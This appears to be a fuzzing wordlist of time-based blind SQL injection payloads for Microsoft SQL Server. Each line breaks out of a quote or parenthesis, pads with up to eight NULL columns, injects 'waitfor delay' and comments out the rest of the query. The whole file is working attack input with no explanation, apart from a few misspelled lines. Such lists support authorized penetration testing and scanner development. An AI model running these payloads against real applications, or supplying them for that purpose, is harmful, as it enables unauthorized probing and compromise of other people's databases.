) waitfor delay '0:0:04:30' /*
) waitfor delay '0:0:04:30' --
') waitfor delay '0:0:04:30' /*
') waitfor delay '0:0:04:30' --
") waitfor delay '0:0:04:30' /*
") waitfor delay '0:0:04:30' --
)) waitfor delay '0:0:04:30' /*
)) waitfor delay '0:0:04:30' --
')) waitfor delay '0:0:04:30' /*
')) waitfor delay '0:0:04:30' --
")) waitfor delay '0:0:04:30' /*
")) waitfor delay '0:0:04:30' --
,NULL) waitfor delay '0:0:04:30' /*
,NULL) waitfor delay '0:0:04:30' --
',NULL) waifor delay '0:0:04:30' /*
',NULL) waitfor delay '0:0:04:30' --
",NULL) waitfor delay '0:0:04:30' /*
",NULL) waitfor delay '0:0:04:30' --
),NULL) waitfor delay '0:0:04:30' /*
),NULL) waitfor delay '0:0:04:30' --
'),NULL) waifor delay '0:0:04:30' /*
'),NULL) waitfor delay '0:0:04:30' --
"),NULL) waitfor delay '0:0:04:30' /*
"),NULL) waitfor delay '0:0:04:30' --
,NULL,NULL) waitfor delay '0:0:04:30' /*
,NULL,NULL) waitfor delay '0:0:04:30' --
',NULL,NULL) waitfor delay '0:0:04:30' /*
',NULL,NULL) waitfor delay '0:0:04:30' --
",NULL,NULL) waitfor delay '0:0:04:30' /*
",NULL,NULL) waitfor delay '0:0:04:30' --
),NULL,NULL) waitfor delay '0:0:04:30' /*
),NULL,NULL) waitfor delay '0:0:04:30' --
'),NULL,NULL) waitfor delay '0:0:04:30' /*
'),NULL,NULL) waitfor delay '0:0:04:30' --
"),NULL,NULL) waitfor delay '0:0:04:30' /*
"),NULL,NULL) waitfor delay '0:0:04:30' --
,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
',NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
',NULL,NULL,NULL) waitfor delay '0:0:04:30' --
",NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
",NULL,NULL,NULL) waitfor delay '0:0:04:30' --
),NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
),NULL,NULL,NULL) waitfor delay '0:0:04:30' --
'),NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
'),NULL,NULL,NULL) waitfor delay '0:0:04:30' --
"),NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
"),NULL,NULL,NULL) waitfor delay '0:0:04:30' --
,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
',NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
',NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
",NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
",NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
),NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
),NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
'),NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
'),NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
"),NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
"),NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
',NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
',NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
",NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
",NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
'),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
'),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
"),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
"),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
',NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
',NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
",NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
",NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
'),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
'),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
"),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
"),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
',NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
",NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' /*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:04:30' --
